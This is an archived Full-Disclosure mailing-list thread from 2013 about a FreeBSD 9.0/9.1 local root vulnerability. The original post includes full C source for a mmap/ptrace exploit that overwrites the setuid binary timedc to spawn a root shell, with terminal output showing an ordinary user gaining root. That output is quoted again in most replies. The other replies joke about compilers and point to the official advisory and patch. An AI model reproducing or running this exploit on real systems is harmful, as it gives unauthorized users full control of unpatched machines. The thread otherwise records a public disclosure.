Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
Poul-Henning Kamp actually walks by my house once in a while, you guys
wan't me to ask him anything :P?
On Wed, Jun 19, 2013 at 11:32 PM, Hunger hun...@hunger.hu wrote:
$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
Mvh.
Kim Henriksen
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#
got fixed. and in the same time - geli got f...d up.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
On Thu, Jun 20, 2013 at 03:57:20PM -0700, Kurt Buff wrote: On Thu, Jun 20, 2013 at 3:41 PM, valdis.kletni...@vt.edu wrote: On Thu, 20 Jun 2013 06:56:16 -0500, Mark Felder said: But does your exploit compile with clang? I'm gonna have to call Poe's Law on this one. I can't tell if you're trolling or merely confused. :) My guess is he's troll-baiting. Incorporation of clang in FreeBSD as the default compiler (vs. gnucc) has been a matter of some heat+light in the FreeBSD community. Kurt i won moderate amount of beer from bets on when will freebsd ditch gcc from base?. fanatics took the bait and get mad at the observation freebsd wouldn't exist in its current form without gcc. since at least recently clang can't compile some stuff g++ can (almost sure gnu extensions). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
On Fri, Jun 21, 2013 at 7:48 AM, Georgi Guninski gunin...@guninski.com wrote: On Thu, Jun 20, 2013 at 03:57:20PM -0700, Kurt Buff wrote: ... i won moderate amount of beer from bets on when will freebsd ditch gcc from base?. fanatics took the bait and get mad at the observation freebsd wouldn't exist in its current form without gcc. since at least recently clang can't compile some stuff g++ can (almost sure gnu extensions). Clang has caused a lot of pain and misery because it claims to be GCC, but it can't digest programs with GCC extensions. https://www.google.com/#q=clang+__GNUC__+bug Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
:))
and with pcc too :)
On Thu, Jun 20, 2013 at 1:56 PM, Mark Felder f...@feld.me wrote:
On Wed, 19 Jun 2013 16:32:59 -0500, Hunger hun...@hunger.hu wrote:
$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#
But does your exploit compile with clang?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
On Wed, 19 Jun 2013 16:32:59 -0500, Hunger hun...@hunger.hu wrote:
$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#
But does your exploit compile with clang?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
On Thu, 20 Jun 2013 06:56:16 -0500, Mark Felder said: But does your exploit compile with clang? I'm gonna have to call Poe's Law on this one. I can't tell if you're trolling or merely confused. :) pgpaBf1CNScQF.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
On Thu, Jun 20, 2013 at 3:41 PM, valdis.kletni...@vt.edu wrote: On Thu, 20 Jun 2013 06:56:16 -0500, Mark Felder said: But does your exploit compile with clang? I'm gonna have to call Poe's Law on this one. I can't tell if you're trolling or merely confused. :) My guess is he's troll-baiting. Incorporation of clang in FreeBSD as the default compiler (vs. gnucc) has been a matter of some heat+light in the FreeBSD community. Kurt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
Believe patch already released
On Wednesday, June 19, 2013, Hunger wrote:
$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu javascript:;
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#
/*
* FreeBSD 9.{0,1} mmap/ptrace exploit
* by Hunger fbsd9...@hunger.hu
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years ago... :)
*
* Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof,
* sd, sghctoma, snq, spender, s2crew and others at #hekkcamp:
* I hope we'll meet again at 8@1470n ;)
*
* Special thanks to proactivesec.com
*
*/
#include err.h
#include errno.h
#include unistd.h
#include stdio.h
#include stdlib.h
#include string.h
#include fcntl.h
#include sys/stat.h
#include sys/mman.h
#include sys/types.h
#include sys/ptrace.h
#include sys/wait.h
#define SH /bin/sh
#define TG /usr/sbin/timedc
int
main(int ac, char **av) {
int from_fd, to_fd, status;
struct stat st;
struct ptrace_io_desc piod;
char *s, *d;
pid_t pid;
if (geteuid() == 0) {
setuid(0);
execl(SH, SH, NULL);
return 0;
}
printf(FreeBSD 9.{0,1} mmap/ptrace exploit\n);
printf(by Hunger fbsd9...@hunger.hu\n);
if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
(to_fd = open(TG, O_RDONLY)) == -1)
err(1, open);
if (stat(av[0], st) == -1)
err(2, stat);
if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
(d = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
err(3, mmap);
if ((pid = fork()) == -1)
err(4, fork);
if (!pid) {
if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
err(5, ptraceme);
return 0;
}
if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
err(6, ptattach);
if (wait(status) == -1)
err(7, wait);
piod.piod_op = PIOD_WRITE_D;
piod.piod_offs = d;
piod.piod_addr = s;
piod.piod_len = st.st_size;
if (ptrace(PT_IO, pid, (caddr_t)piod, 0) == -1)
err(8, ptio);
execl(TG, TG, NULL);
return 0;
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
You mean patched:-
http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc
- Original Message -
From: Hunger hun...@hunger.hu
$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#
___
freebsd-hack...@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-hackers
To unsubscribe, send any mail to freebsd-hackers-unsubscr...@freebsd.org
This e.mail is private and confidential between Multiplay (UK) Ltd. and the person or entity to whom it is addressed. In the event of misdirection, the recipient is prohibited from using, copying, printing or otherwise disseminating it or any information contained in it.
In the event of misdirection, illegible or incomplete transmission please
telephone +44 845 868 1337
or return the E.mail to postmas...@multiplay.co.uk.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
